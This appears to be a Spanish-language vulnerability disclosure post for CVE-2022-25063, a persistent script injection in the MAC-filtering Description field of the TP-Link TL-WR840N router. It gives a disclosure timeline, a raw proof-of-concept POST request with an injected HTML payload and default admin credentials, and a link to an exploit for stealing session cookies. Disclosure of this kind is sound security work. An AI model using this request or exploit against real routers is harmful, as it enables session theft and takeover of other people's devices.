Descripción de la vulnerabilidad
TL-WR840N
Router TPLINK Tl-WR840N Inalámbrico es un dispositivo con velocidad de transmisión de 300 Megabit por segundo (Mbps). Es el dispositivo de red justo para tareas cotidianas que requieren banda ancha y trabajos del día a día.
EL PROBLEMA
Esta versión es afectada por la ejecución de codigo remoto el modulo inhalambrico->Filtrado de Mac.
VERSIONES AFECTADAS
Se estima que las versiones afectadas sean <= TL-WR840N(ES)_V6.20_180709
Línea de tiempo
Fecha | Acción |
10/12/2021 | Aviso enviado a la respuesta a incidentes de seguridad de productos TPLINK |
13/12/2021 | Se recibe una respuesta con el equipo de seguridad de TPLINK |
02/02/2022 | Se recibe una version beta y se verifica la mitigacion de la vulnerabilidad |
09/02/2022 | Se cierra el caso con el hallazgo identificado |
Descripción técnica y prueba de concepto (PoC)
Identificación de vulnerabilidad a traves de la ingenieria inversa
Este modulo no verifica de forma correcta los caracteres pasados al parámetro Description, desde el lado del backend, lo cual permite la inserción de código Javascript de forma persistente.
Teniendo en cuenta que este valor del campo Description es alojado al lado del front-end tal cual como se almaceno.
El primer paso es identificar los parámetros que se envían sobre la petición POST para filtrar una dirección MAC.
POST /cgi?3 HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: */*
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: text/plain
Content-Length: 149
Origin: http://192.168.0.1
Connection: close
Referer: http://192.168.0.1/mainFrame.htm
Cookie: Authorization=Basic YWRtaW46YWRtaW4=
[LAN_WLAN_MACTABLEENTRY#0,0,0,0,0,0#1,1,0,0,0,0]0,4
Enabled=1
Description=<div><h2>Pwned</h2></div>
MACAddress=00:11:22:33:44:55
HostName=wlan0
Podemos apreciar la inserción de código HTML bajo el parámetro Description y la persistencia de los datos de forma reflejada en el front-end del dispositivo.
La explotación
Las técnicas de explotación de este tipo de vulnerabilidades depende de la estrategia que use el atacante, lo importante aquí es demostrar la persistencia de la inyección de código javascript dentro del dispositivo, ejecute el siguiente exploit para poder ver de una forma aplicada la divulgación de las cookies de sesión.
Finalmente ejecute el exploit y obtenga un resultado completo del ataque.
URL mitre: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25063
URL código de explotación: https://github.com/exploitwritter/CVE-2022-25063
Deja un comentario